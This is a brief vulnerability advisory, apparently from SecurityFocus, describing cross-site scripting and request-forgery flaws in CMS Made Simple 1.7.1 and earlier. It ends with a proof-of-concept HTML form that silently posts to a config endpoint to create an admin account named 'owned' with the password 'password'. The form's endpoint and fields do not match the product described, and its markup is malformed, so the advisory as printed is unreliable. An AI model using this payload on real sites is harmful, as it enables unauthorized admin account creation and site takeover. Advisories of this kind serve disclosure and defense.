source: https://www.securityfocus.com/bid/40483/info
CMS Made Simple is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied inputs. The application is also prone to a cross-site request-forgery vulnerability.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The attacker can exploit the cross-site request-forgery issue by tricking a victim into following a specially crafted HTTP request designed to perform some action on the attacker's behalf using a victim's currently active session.
CMS Made Simple 1.7.1and prior are vulnerable.<form name="csrf"
action="http://www.example.com:7080/config/confMgr.php"
method="post" target="hidden"><inputtype="hidden" name="a" value="s"/><inputtype="hidden" name="m" value="admin"/><inputtype="hidden" name="p" value="security"/><inputtype="hidden" name="t" value="`ADMIN_USR_NEW"/><inputtype="hidden" name="r" value=""/><inputtype="hidden" name="file_create" value=""/><inputtype="hidden" name="name" value="owned"/><inputtype="hidden" name="pass" value="password"/><inputtype="hidden" name="pass1" value="password"/></form>
